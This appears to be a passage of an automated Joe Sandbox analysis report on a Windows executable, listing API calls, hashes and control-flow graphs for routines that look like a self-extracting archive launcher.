                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DloadSection$AccessWrite$ExceptionProtectRaiseRelease$AcquireErrorLastLibraryLoad
                                  • String ID: H
                                  • API String ID: 282135826-2852464175
                                  • Opcode ID: 1ba3ac7ad01aad9b5bbf5288423d8bdca45e536d0fe216ed71dd1fdc31554d99
                                  • Instruction ID: 76479ed73dbbed87f28dd66f51f23d0006c25fb52b4b37e33fb6099a75673f79
                                  • Opcode Fuzzy Hash: 1ba3ac7ad01aad9b5bbf5288423d8bdca45e536d0fe216ed71dd1fdc31554d99
                                  • Instruction Fuzzy Hash: 84916E62A19B518BEB04EF65E8846ACF3B1BB08BA8F844435DE0D57B54EF38F454C790
                                  APIs
                                    • Part of subcall function 00007FF7C0189254: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7C0189389
                                  • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7C018A375
                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018A82F
                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018A835
                                    • Part of subcall function 00007FF7C019033C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7C0189CBA), ref: 00007FF7C0190369
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                  • API String ID: 3629253777-3268106645
                                  • Opcode ID: 87966f23d4e29822f34e3fcc0e0a882ae27015c9125862882d54e96057c8a0e0
                                  • Instruction ID: b5513aeeefdb0aadd1fe9aa70a870b67a897153905d1d9a4f36a37dcd14e097c
                                  • Opcode Fuzzy Hash: 87966f23d4e29822f34e3fcc0e0a882ae27015c9125862882d54e96057c8a0e0
                                  • Instruction Fuzzy Hash: D2629E62A19B8297EB10EF24E4441ADE3A5FB40BA4FC54231DA4D87795EF3CF644C3A1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2088 7ff7c01a3030-7ff7c01a3073 2089 7ff7c01a33e4-7ff7c01a3409 call 7ff7c0181b70 call 7ff7c01a5c30 2088->2089 2090 7ff7c01a3079-7ff7c01a30b5 call 7ff7c01a74c0 2088->2090 2096 7ff7c01a30b7 2090->2096 2097 7ff7c01a30ba-7ff7c01a30c1 2090->2097 2096->2097 2098 7ff7c01a30d2-7ff7c01a30d6 2097->2098 2099 7ff7c01a30c3-7ff7c01a30c7 2097->2099 2103 7ff7c01a30d8 2098->2103 2104 7ff7c01a30db-7ff7c01a30e6 2098->2104 2101 7ff7c01a30c9 2099->2101 2102 7ff7c01a30cc-7ff7c01a30d0 2099->2102 2101->2102 2102->2104 2103->2104 2105 7ff7c01a3178 2104->2105 2106 7ff7c01a30ec 2104->2106 2108 7ff7c01a317c-7ff7c01a317f 2105->2108 2107 7ff7c01a30f2-7ff7c01a30f9 2106->2107 2109 7ff7c01a30fb 2107->2109 2110 7ff7c01a30fe-7ff7c01a3103 2107->2110 2111 7ff7c01a3181-7ff7c01a3185 2108->2111 2112 7ff7c01a3187-7ff7c01a318a 2108->2112 2109->2110 2113 7ff7c01a3135-7ff7c01a3140 2110->2113 2114 7ff7c01a3105 2110->2114 2111->2112 2115 7ff7c01a31b0-7ff7c01a31c3 call 7ff7c0187b68 2111->2115 2112->2115 2116 7ff7c01a318c-7ff7c01a3193 2112->2116 2119 7ff7c01a3142 2113->2119 2120 7ff7c01a3145-7ff7c01a314a 2113->2120 2121 7ff7c01a311a-7ff7c01a3120 2114->2121 2127 7ff7c01a31c5-7ff7c01a31e3 call 7ff7c0190aa0 2115->2127 2128 7ff7c01a31e8-7ff7c01a323d call 7ff7c01aaf0c call 7ff7c01812bc call 7ff7c018587c call 7ff7c0181b70 2115->2128 2116->2115 2117 7ff7c01a3195-7ff7c01a31ac 2116->2117 2117->2115 2119->2120 2125 7ff7c01a3150-7ff7c01a3157 2120->2125 2126 7ff7c01a340a-7ff7c01a3411 2120->2126 2122 7ff7c01a3122 2121->2122 2123 7ff7c01a3107-7ff7c01a310e 2121->2123 2122->2113 2133 7ff7c01a3110 2123->2133 2134 7ff7c01a3113-7ff7c01a3118 2123->2134 2129 7ff7c01a3159 2125->2129 2130 7ff7c01a315c-7ff7c01a3162 2125->2130 2131 7ff7c01a3413 2126->2131 2132 7ff7c01a3416-7ff7c01a341b 2126->2132 2127->2128 2155 7ff7c01a323f-7ff7c01a328d call 7ff7c01aaf0c call 7ff7c01812bc call 7ff7c01872ac call 7ff7c0181b70 2128->2155 2156 7ff7c01a3292-7ff7c01a329f ShellExecuteExW 2128->2156 2129->2130 2130->2126 2137 7ff7c01a3168-7ff7c01a3172 2130->2137 2131->2132 2138 7ff7c01a342e-7ff7c01a3436 2132->2138 2139 7ff7c01a341d-7ff7c01a3424 2132->2139 2133->2134 2134->2121 2140 7ff7c01a3124-7ff7c01a312b 2134->2140 2137->2105 2137->2107 2141 7ff7c01a3438 2138->2141 2142 7ff7c01a343b-7ff7c01a3446 2138->2142 2147 7ff7c01a3426 2139->2147 2148 7ff7c01a3429 2139->2148 2143 7ff7c01a3130 2140->2143 2144 7ff7c01a312d 2140->2144 2141->2142 2142->2108 2143->2113 2144->2143 2147->2148 2148->2138 2155->2156 2158 7ff7c01a3396-7ff7c01a339e 2156->2158 2159 7ff7c01a32a5-7ff7c01a32af 2156->2159 2160 7ff7c01a33a0-7ff7c01a33b6 2158->2160 2161 7ff7c01a33d2-7ff7c01a33df 2158->2161 2163 7ff7c01a32bf-7ff7c01a32c2 2159->2163 2164 7ff7c01a32b1-7ff7c01a32b4 2159->2164 2165 7ff7c01a33b8-7ff7c01a33cb 2160->2165 2166 7ff7c01a33cd call 7ff7c01a5b1c 2160->2166 2161->2089 2169 7ff7c01a32c4-7ff7c01a32cf IsWindowVisible 2163->2169 2170 7ff7c01a32de-7ff7c01a32f1 WaitForInputIdle call 7ff7c01a3928 2163->2170 2164->2163 2168 7ff7c01a32b6-7ff7c01a32bd 2164->2168 2165->2166 2172 7ff7c01a344b-7ff7c01a3453 call 7ff7c01aae94 2165->2172 2166->2161 2168->2163 2175 7ff7c01a3333-7ff7c01a3340 CloseHandle 2168->2175 2169->2170 2176 7ff7c01a32d1-7ff7c01a32dc ShowWindow 2169->2176 2177 7ff7c01a32f6-7ff7c01a32fd 2170->2177 2180 7ff7c01a3342-7ff7c01a3353 call 7ff7c0190aa0 2175->2180 2181 7ff7c01a3355-7ff7c01a335c 2175->2181 2176->2170 2177->2175 2182 7ff7c01a32ff-7ff7c01a3302 2177->2182 2180->2181 2186 7ff7c01a337e-7ff7c01a3380 2180->2186 2181->2186 2187 7ff7c01a335e-7ff7c01a3361 2181->2187 2182->2175 2188 7ff7c01a3304-7ff7c01a3315 GetExitCodeProcess 2182->2188 2186->2158 2192 7ff7c01a3382-7ff7c01a3385 2186->2192 2187->2186 2191 7ff7c01a3363-7ff7c01a3378 2187->2191 2188->2175 2193 7ff7c01a3317-7ff7c01a332c 2188->2193 2191->2186 2192->2158 2195 7ff7c01a3387-7ff7c01a3395 ShowWindow 2192->2195 2193->2175 2195->2158
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_invalid_parameter_noinfo_noreturn
                                  • String ID: .exe$.inf$Install$p
                                  • API String ID: 148627002-3607691742
                                  • Opcode ID: 7ff84cc4936af5bcef10331d165799f6bfe69847ad0aaccc2564c490b21f0d06
                                  • Instruction ID: e6c9df9321e0324041a059a3403a25f30df28a7527592d9eda0e690ad3523c6b
                                  • Opcode Fuzzy Hash: 7ff84cc4936af5bcef10331d165799f6bfe69847ad0aaccc2564c490b21f0d06
                                  • Instruction Fuzzy Hash: DFC16062B1C68286EA14EF25F54427DE3A1EF85FA0F844035EA4D877A4DF3CF56583A0

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                  • String ID:
                                  • API String ID: 4119318379-0
                                  • Opcode ID: 5ff2d565dfc5db30faf5757a2f3953a4f42f62c0c62e185934d8e45e8a36dc63
                                  • Instruction ID: c7b90c7fb0f257cbc7da54723310aeb5b4da01d170b4b53c9d3a82363bb01e0a
                                  • Opcode Fuzzy Hash: 5ff2d565dfc5db30faf5757a2f3953a4f42f62c0c62e185934d8e45e8a36dc63
                                  • Instruction Fuzzy Hash: AB41F235B1465287F710AF61F804BADA360EB49FA8F804135DE1A87B99CF3DF54987A0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2240 7ff7c019218c-7ff7c019219f call 7ff7c01a57cc
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: AES-0017$map/set too long$z01$zip$zipx$zx01
                                  • API String ID: 909987262-704999473
                                  • Opcode ID: 279821ddad5ca0a3171316fe86be340fa28ecb032434c2a7f18e4b4bd5f06c06
                                  • Instruction ID: 12f8903f7242fc5884e4ba327b78b9701756075e9dc1f9de2585acaf61885941
                                  • Opcode Fuzzy Hash: 279821ddad5ca0a3171316fe86be340fa28ecb032434c2a7f18e4b4bd5f06c06
                                  • Instruction Fuzzy Hash: 3DB0921890810A82D12CBE80A841068D3109B14B10ED00C3082188AA620B28705242A2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2294 7ff7c01846a0-7ff7c01846db 2295 7ff7c01846dd-7ff7c01846e4 2294->2295 2296 7ff7c01846e6 2294->2296 2295->2296 2297 7ff7c01846e9-7ff7c0184758 2295->2297 2296->2297 2298 7ff7c018475d-7ff7c0184788 CreateFileW 2297->2298 2299 7ff7c018475a 2297->2299 2300 7ff7c018478e-7ff7c01847be GetLastError call 7ff7c01880b0 2298->2300 2301 7ff7c0184868-7ff7c018486d 2298->2301 2299->2298 2309 7ff7c018480c 2300->2309 2310 7ff7c01847c0-7ff7c018480a CreateFileW GetLastError 2300->2310 2303 7ff7c0184873-7ff7c0184877 2301->2303 2305 7ff7c0184879-7ff7c018487c 2303->2305 2306 7ff7c0184885-7ff7c0184889 2303->2306 2305->2306 2311 7ff7c018487e 2305->2311 2307 7ff7c018488b-7ff7c018488f 2306->2307 2308 7ff7c01848af-7ff7c01848c3 2306->2308 2307->2308 2312 7ff7c0184891-7ff7c01848a9 SetFileTime 2307->2312 2313 7ff7c01848ec-7ff7c0184915 call 7ff7c01a5c30 2308->2313 2314 7ff7c01848c5-7ff7c01848d0 2308->2314 2315 7ff7c0184812-7ff7c018481a 2309->2315 2310->2315 2311->2306 2312->2308 2316 7ff7c01848e8 2314->2316 2317 7ff7c01848d2-7ff7c01848da 2314->2317 2318 7ff7c018481c-7ff7c0184833 2315->2318 2319 7ff7c0184853-7ff7c0184866 2315->2319 2316->2313 2321 7ff7c01848dc 2317->2321 2322 7ff7c01848df-7ff7c01848e3 call 7ff7c0181c80 2317->2322 2323 7ff7c018484e call 7ff7c01a5b1c 2318->2323 2324 7ff7c0184835-7ff7c0184848 2318->2324 2319->2303 2321->2322 2322->2316 2323->2319 2324->2323 2327 7ff7c0184916-7ff7c018491b call 7ff7c01aae94 2324->2327
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 3536497005-0
                                  • Opcode ID: f2a95c046f384fb88cb42bad2343db76857be23356c2a59daf525ee97aa7854a
                                  • Instruction ID: 2d2be3891b4bc1b4be7087b5669da3efa8aac66355d728dbebf3e28b70f1a2a6
                                  • Opcode Fuzzy Hash: f2a95c046f384fb88cb42bad2343db76857be23356c2a59daf525ee97aa7854a
                                  • Instruction Fuzzy Hash: F961F262A0878187E720AF69F44036EE7A1BB85BB8F500324DFA943BD4DF3CE1548790

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$File$System$Local$SpecificVersion
                                  • String ID:
                                  • API String ID: 2092733347-0
                                  • Opcode ID: 7415bec7d798ad501b197d19bbfbfb4fb824aa0f8bac73e46940edbbb5db9b65
                                  • Instruction ID: ff55755c83c6dfc813d4e9cce33a703095942d814b03c9a5a21242c087326ae0
                                  • Opcode Fuzzy Hash: 7415bec7d798ad501b197d19bbfbfb4fb824aa0f8bac73e46940edbbb5db9b65
                                  • Instruction Fuzzy Hash: DE314C62B10651DEFB00DFB5E8901ACB770FB08B68B94502AEE0D97B58EF38E595C750

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2341 7ff7c01a3810-7ff7c01a383b 2342 7ff7c01a3840-7ff7c01a387a SetEnvironmentVariableW call 7ff7c018cf98 2341->2342 2343 7ff7c01a383d 2341->2343 2346 7ff7c01a38c7-7ff7c01a38cf 2342->2346 2347 7ff7c01a387c 2342->2347 2343->2342 2349 7ff7c01a38d1-7ff7c01a38e7 2346->2349 2350 7ff7c01a3903-7ff7c01a391e call 7ff7c01a5c30 2346->2350 2348 7ff7c01a3880-7ff7c01a3888 2347->2348 2351 7ff7c01a388a 2348->2351 2352 7ff7c01a388d-7ff7c01a3898 call 7ff7c018d3b8 2348->2352 2353 7ff7c01a38e9-7ff7c01a38fc 2349->2353 2354 7ff7c01a38fe call 7ff7c01a5b1c 2349->2354 2351->2352 2363 7ff7c01a38a7-7ff7c01a38ac 2352->2363 2364 7ff7c01a389a-7ff7c01a38a5 2352->2364 2353->2354 2358 7ff7c01a391f-7ff7c01a3927 call 7ff7c01aae94 2353->2358 2354->2350 2365 7ff7c01a38b1-7ff7c01a38c6 SetEnvironmentVariableW 2363->2365 2366 7ff7c01a38ae 2363->2366 2364->2348 2365->2346 2366->2365
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                  • String ID: sfxcmd$sfxpar
                                  • API String ID: 3540648995-3493335439
                                  • Opcode ID: 5a57c69db1c650ffc0109058ee75098a0d594147db01f3cd247ccf932cb967a8
                                  • Instruction ID: eead23c469451fdabfbcc2a2cff229655315505558af4a2def74dbcff605a7b5
                                  • Opcode Fuzzy Hash: 5a57c69db1c650ffc0109058ee75098a0d594147db01f3cd247ccf932cb967a8
                                  • Instruction Fuzzy Hash: E4316062A18B4585EF04AF65F4841ACE371EB44FA8F840235EE1D97BA9DF3CE151C3A0

                                  Control-flow Graph

                                  APIs
                                  • LoadBitmapW.USER32 ref: 00007FF7C019EB7A
                                  • GetObjectW.GDI32 ref: 00007FF7C019EBAB
                                  • DeleteObject.GDI32 ref: 00007FF7C019EBE5
                                  • DeleteObject.GDI32 ref: 00007FF7C019EC15
                                    • Part of subcall function 00007FF7C019C260: FindResourceW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7C01A4517), ref: 00007FF7C019C279
                                    • Part of subcall function 00007FF7C019C260: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7C01A4517), ref: 00007FF7C019C295
                                    • Part of subcall function 00007FF7C019C260: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7C01A4517), ref: 00007FF7C019C2AF
                                    • Part of subcall function 00007FF7C019C260: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7C01A4517), ref: 00007FF7C019C2C1
                                    • Part of subcall function 00007FF7C019C260: GlobalAlloc.KERNELBASE ref: 00007FF7C019C2E2
                                    • Part of subcall function 00007FF7C019C260: GlobalLock.KERNEL32 ref: 00007FF7C019C2F7
                                    • Part of subcall function 00007FF7C019C260: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF7C019C3A5
                                    • Part of subcall function 00007FF7C019C260: GlobalUnlock.KERNEL32 ref: 00007FF7C019C3C8
                                    • Part of subcall function 00007FF7C019C260: GlobalFree.KERNEL32 ref: 00007FF7C019C3D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                  • String ID: ]
                                  • API String ID: 1428510222-3352871620
                                  • Opcode ID: 4bf2bc35f3b21ea03de476389abc0e83db34e9447328c44d88c742213a9449e8
                                  • Instruction ID: 775e4e932fe155a53995b36b26a7a7306e07fc8236afa4181b79d0619ae85cfb
                                  • Opcode Fuzzy Hash: 4bf2bc35f3b21ea03de476389abc0e83db34e9447328c44d88c742213a9449e8
                                  • Instruction Fuzzy Hash: DF113021A0D64687EA14BF51F65427DD2D3AF89FE0F880034D95E87B8ADF2CF50486A0

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                  • String ID:
                                  • API String ID: 3621893840-0
                                  • Opcode ID: c630aa0803547081c4d72855550468f4e84ba9b42f5c9c7b8480925491db25bb
                                  • Instruction ID: 773891a58f13baf687f93e6eba4342e9de7c3abd5edac5de2d4ab9cebe3ac6b2
                                  • Opcode Fuzzy Hash: c630aa0803547081c4d72855550468f4e84ba9b42f5c9c7b8480925491db25bb
                                  • Instruction Fuzzy Hash: E7F04F62B2849683F750AF20F459B7EE211EFE4F15FC41034EA5E81A949F2CE149CB60

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Message$DialogDispatchPeekTranslate
                                  • String ID:
                                  • API String ID: 1266772231-0
                                  • Opcode ID: e45bfd896b69646a0b5eeb10867a712a562e5ff66da3ebe7d8c5d592be84918c
                                  • Instruction ID: 6a873102e9d667f498d0ea343d1acd71319f63c73c169488799409e377d6ec0d
                                  • Opcode Fuzzy Hash: e45bfd896b69646a0b5eeb10867a712a562e5ff66da3ebe7d8c5d592be84918c
                                  • Instruction Fuzzy Hash: 4EF0E126A3855283EB50AF60F859A7EE351FFD4F15FC45035EA4E81A54DF2CE108C750
                                  APIs
                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019568F
                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0195695
                                    • Part of subcall function 00007FF7C0186288: FindClose.KERNELBASE(?,?,?,00007FF7C018FFA5), ref: 00007FF7C01862BD
                                    • Part of subcall function 00007FF7C0191DD0: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7C0191E25
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseFindswprintf
                                  • String ID: zip$zipx
                                  • API String ID: 2713956076-1268445101
                                  • Opcode ID: 0c43c1b66e07d995b1cbb6a2f2b962e78e60540c5e6c8088aa3c6015e6fa861f
                                  • Instruction ID: abbe9c401b81fade7faceed6f644be7757a54b178f7845eb62654494d9dc3700
                                  • Opcode Fuzzy Hash: 0c43c1b66e07d995b1cbb6a2f2b962e78e60540c5e6c8088aa3c6015e6fa861f
                                  • Instruction Fuzzy Hash: 40816A62B08A0287FB10AF65B4445ACE3A2AB45FB4FD04235DE2DA7795DF3CB045C3A0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
